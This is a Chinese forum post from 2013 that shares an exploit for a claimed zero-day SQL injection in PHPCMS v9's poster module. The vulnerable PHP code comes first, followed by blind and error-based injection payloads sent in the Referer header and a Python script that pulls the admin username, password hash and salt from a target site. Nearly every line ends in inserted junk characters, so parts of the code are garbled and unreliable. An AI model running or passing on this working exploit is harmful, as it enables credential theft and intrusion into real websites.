有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
6 w8 w% n3 y$ {+ Z
0 f; G ^$ u0 r. g/ k' L问题函数\phpcms\modules\poster\index.php
7 L* k, o6 N$ R5 h
2 Q( w3 [3 l8 z" _7 s9 q- v8 Vpublic function poster_click() {# q2 s2 \+ o8 J! A. @% U- k2 |
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;% }1 B0 E6 U2 d5 @. l
$r = $this->db->get_one(array('id'=>$id));
5 W$ g/ @5 x; L. X( [/ w- E3 Uif (!is_array($r) && empty($r)) return false;
5 V( M- ?) }& L: o8 u$ip_area = pc_base::load_sys_class('ip_area');
1 v4 {7 g H7 f' f8 O& z9 \! J2 J$ip = ip();
f8 z* b/ c9 d/ Y$area = $ip_area->get($ip);
+ }* s" L3 e' |& l$username = param::get_cookie('username') ? param::get_cookie('username') : '';
6 h! X/ j4 Z) Z8 gif($id) {
0 U3 E. J; ?% C4 x$ l( e# O$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
5 }+ A" p$ [6 o& H/ T7 r2 o7 e$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));3 Z/ S5 z% w9 M7 D8 [; Q: T
}
) ^- s9 J4 F0 X% N$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
/ j4 }; Y: V# b( h9 V$setting = string2array($r['setting']);
6 N2 B# f! c& G/ p, ~; V& kif (count($setting)==1) { t* c# C* S& y! a7 k
$url = $setting['1']['linkurl'];
* y- a6 q" a/ B7 c' A} else {' ]# A4 q+ M: c' P: b. @
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
% o6 F) {6 X& T8 D# ^9 L' P8 s4 h}
$ o& o! D7 x. W7 _: r9 ~header('Location: '.$url); R% j; w0 f8 p2 j: s# y# J* s" ]* ^
}
, E0 u" j6 I4 P9 ~! v: Q- k" u" g4 U6 l% m
9 B( z9 @4 A4 e' X
4 H: T6 n) }9 ~利用方式:* j: q/ F1 S; k8 o
( r6 g+ \+ _( g9 V( t1、可以采用盲注入的手法:
! i/ [3 I6 o) R: N0 G$ m
3 i4 Q5 o6 l2 e r& F% }referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#9 G4 t/ m3 @" E/ s5 s, _
/ F% q5 c! H; h) {
通过返回页面,正常与否一个个猜解密码字段。
$ u2 ]5 q, p C, e
% R( M) ]% ?7 k5 U$ z% h* M1 t0 `2、代码是花开写的,随手附上了:
0 e3 T0 T- L& \2 c/ o2 o& ?+ E6 T6 Q5 e* r) n
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#% y+ z) r6 H2 n) z
5 l2 T$ C5 G) O3 t
此方法是爆错注入手法,原理自查。5 u1 p$ u6 V% _! T6 i
T4 b( W+ B& N
( e: z# D7 q3 x$ \/ L' J3 g( j
7 I! |4 R0 T( y* i I利用程序:
, ]1 A3 n/ Y5 b3 h' L# @
# N' J3 }7 ^% g* ~#!/usr/bin/env python2 n! |" f! f, l" l9 ^, @& }
import httplib,sys,re1 V% N9 c2 r! H( ^+ Y% V1 i" Q- ?
% Z+ t5 O {' j+ Zdef attack():8 q, X/ U" l4 K# K% ~# R D
print “Code by Pax.Mac Team conqu3r!”
6 I+ W/ ` p5 Mprint “Welcome to our zone!!!”% z: H; D: ^ |" G, W# \4 G" _
url=sys.argv[1]0 Z7 ?+ g5 r* v# X; M
paths=sys.argv[2]
: G5 | }& `% Y, ~conn = httplib.HTTPConnection(url): Q) y( Y' \* u" Z( F1 E
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,7 s- m0 K' O% x0 x$ q% h
“Accept”: “text/plain”,
; d+ N2 g9 m2 B$ ] N+ p5 I“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}% y+ B5 L6 H+ h, Y( u) B- p
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), A' E; M/ i/ D$ d3 b
r1 = conn.getresponse()
; d+ L9 e0 n$ s* T) h# @; Zdatas=r1.read(). `" G% N9 M, @4 @
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
: ~7 ], A3 f, O) V/ Nprint datas[0]% ~& E5 e: [2 Q. d
conn.close()
1 s7 ?' u" J" g( oif __name__==”__main__”:
M2 ?- ]. J% `+ P. pif len(sys.argv)<3:
. M6 r- S* @0 Rprint “Code by Pax.Mac Team conqu3r”- U! r8 o- p0 Y6 F: B
print “Usgae:”( T7 }8 }) S+ J1 |/ G: \* q2 F
print “ phpcmsattack.py www.paxmac.org /”
6 [, m6 N8 A% I, P2 d; F; Oprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”+ t1 `- M. V0 G9 g
sys.exit(1)+ ?6 f2 {8 V5 J, V, c
attack()
- K4 Y/ d+ Y! G' L' E* Y& t3 |# X4 j( v% ?6 O
|
发表于 2013-1-11 21:01:00
收藏
支持
反对